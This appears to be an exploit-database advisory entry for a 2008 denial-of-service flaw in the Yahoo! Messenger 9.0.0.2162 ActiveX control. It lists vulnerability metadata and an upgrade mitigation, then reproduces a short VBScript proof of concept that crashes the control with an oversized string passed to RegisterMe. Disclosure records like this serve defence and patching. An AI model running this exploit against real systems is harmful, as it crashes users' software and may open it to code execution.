Yahoo! Messenger Denial-of-Service Vulnerability

vendor:

Yahoo! Messenger

by:

SecurityFocus

7.5

CVSS

HIGH

NULL-pointer dereference error

476

CWE

Product Name: Yahoo! Messenger

Affected Version From: 9.0.0.2162

Affected Version To: 9.0.0.2162

Patch Exists: YES

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Internet Explorer

2008

Yahoo! Messenger Denial-of-Service Vulnerability

Yahoo! Messenger is prone to a denial-of-service vulnerability because of a NULL-pointer dereference error. A successful attack allows a remote attacker to crash the application using the ActiveX control (typically Internet Explorer), denying further service to legitimate users. Given the nature of this issue, the attacker may also be able to run arbitrary code, but this has not been confirmed.

Mitigation:

Upgrade to the latest version of Yahoo! Messenger

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/37007/info

Yahoo! Messenger is prone to a denial-of-service vulnerability because of a NULL-pointer dereference error.

A successful attack allows a remote attacker to crash the application using the ActiveX control (typically Internet Explorer), denying further service to legitimate users. Given the nature of this issue, the attacker may also be able to run arbitrary code, but this has not been confirmed.

Yahoo! Messenger 9.0.0.2162 is vulnerable; other versions may also be affected. 

<?XML version='1.0' standalone='yes' ?>

<package><job id='DoneInVBS' debug='false' error='true'>

<object classid='clsid:58916BE6-BAFF-4F33-AEFE-B2AA03FE4C86' id='target' />

<script language='vbscript'>


arg1=String(11284, "A")

target.RegisterMe arg1

</script>

</job>

</package>